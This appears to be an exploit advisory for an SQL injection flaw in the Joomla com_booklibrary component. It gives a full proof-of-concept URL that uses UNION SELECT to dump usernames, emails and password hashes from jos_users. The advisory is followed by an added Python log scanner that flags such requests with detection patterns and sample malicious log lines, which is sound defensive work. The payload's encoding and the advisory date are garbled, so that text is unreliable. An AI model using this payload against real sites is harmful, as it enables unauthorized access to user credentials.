com_booklibrary is a Joomla plug-in. It contains an SQL injection vulnerability that may lead to leakage of sensitive information.
[+] Info:
~~~~~~~~~
# Exploit Title: SQL Injection in component com_booklibrary for Joomla
# Date: [172.163.2011]
# Author: [Marc Doudiet]
# Software Link: [release
# Version: [Version 2.0 for Joomla 1.5]
# Tested on: [PHP Mysql]
[+] Poc:
~~~~~~~~~
PoC (shows the password hashes from the jos_users table):
http://xxx.xxx.xxx.xxx/index.php?searchtext=%%20OR%20LOWER (B. bookid) % 20 LIKE % 20% a % 20OR % 20 LOWER (B. isbn) % 20 LIKE % 20% a % 20OR % 20 LOWER (B. title) % 20 LIKE % 20% a % 20OR % 20 LOWER (B. manufacturer) % 20 LIKE % 20% a % 20OR % 20 LOWER (B. comment) % 20 LIKE % 20% a %) % 20AND % 20b. published = 1% 20AND % 20b. approved = 1% 20AND % 20b. archived = 0% 20 UNION % 20 SELECT %, username, email, password, 6, 7, 8, 9, 10, 11, 12, 13, 16, 17, 18, 19, 20, 21, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33% 20 FROM % 20jos_users % 20 UNION % 20 SELECT % 20b. *, % 20blr2. rating2, % 20c. title % 20AS % 20category_titel, c. id % 20AS % 20 catid, % 20c. ordering % 20AS % 20category_ordering % 20 FROM % 20jos_booklibrary % 20AS % 20b % 20 LEFT % 20 JOIN % 20jos_booklibrary_categories % 20AS % 20bc % 20ON % 20bc. bookid % 20 = % 20b. id % 20 LEFT % 20 JOIN % 20jos_categories % 20AS % 20c % 20ON % 20bc. catid % 20 = % 20c. id % 20 LEFT % 20 JOIN % 20 (% 20 SELECT % 20 ROUND (avg (blr1.rating) % 20AS % 20rating2, % 20fk_bookid % 20 FROM % 20jos_booklibrary % 20AS % 20bl % 20 LEFT % 20 JOIN % 20jos_booklibrary_review % 20AS % 20blr1% 20ON % 20blr1. fk_bookid % 20 = % 20bl. id % 20 GROUP % 20BY % 20blr1. fk_bookid % 20) % 20blr2% 20ON % 20blr2. fk_bookid % 20 = % 20b. id % 20 WHERE % 20 (LOWER (B. authors) % 20 LIKE % 20% & catid = 0 & option = com_booklibrary & task = search & Itemid = 53 & author = true & title = true & isbn = true
& Description = true & publisher = true & bookid = true
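
A defender-side check for the request shape in the PoC above, added here as an example and not part of the original advisory: it scans web access logs for com_booklibrary search requests whose `searchtext` parameter decodes to SQL syntax, including double-encoded values. The log lines, rule names and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed access-log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?option=com_booklibrary&task=search&searchtext=dune HTTP/1.1" 200 5120',
    '198.51.100.9 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?searchtext=x%25%20UNION%20SELECT%20username,password%20FROM%20jos_users&option=com_booklibrary&task=search HTTP/1.1" 200 48211',
    '203.0.113.4 - - [01/Jan/2024:10:00:07 +0000] "GET /index.php?option=com_booklibrary&task=search&searchtext=a%2520union%2520select%25201,2 HTTP/1.1" 200 900',
    '198.51.100.9 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 2048',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# SQL syntax that has no place in a book search term (hypothetical rule names).
SQLI_PATTERNS = {
    "union_select": re.compile(r"\bunion\b.{0,40}?\bselect\b", re.I | re.S),
    "users_table": re.compile(r"\b\w+_users\b", re.I),  # jos_users or another prefix
    "sql_function": re.compile(r"\b(?:lower|round|avg)\s*\(", re.I),
}

def fully_decode(value, max_rounds=3):
    """Undo extra layers of percent-encoding used to slip past naive filters."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_line(line):
    """Return sorted rule names hit by a com_booklibrary search request."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
    if "com_booklibrary" not in query.get("option", []):
        return []
    hits = set()
    for value in query.get("searchtext", []):
        text = fully_decode(value)  # parse_qs already removed one layer
        hits.update(name for name, rx in SQLI_PATTERNS.items() if rx.search(text))
    return sorted(hits)

def scan(lines):
    """Return (client_ip, rule_names) for every suspicious line."""
    return [(l.split()[0], h) for l in lines if (h := inspect_line(l))]

if __name__ == "__main__":
    for ip, rules in scan(SAMPLE_LOG):
        print(ip, ",".join(rules))
```

Hits are triage leads: a large response size on a flagged request, as in the second constructed line, is a reason to check whether user records were returned.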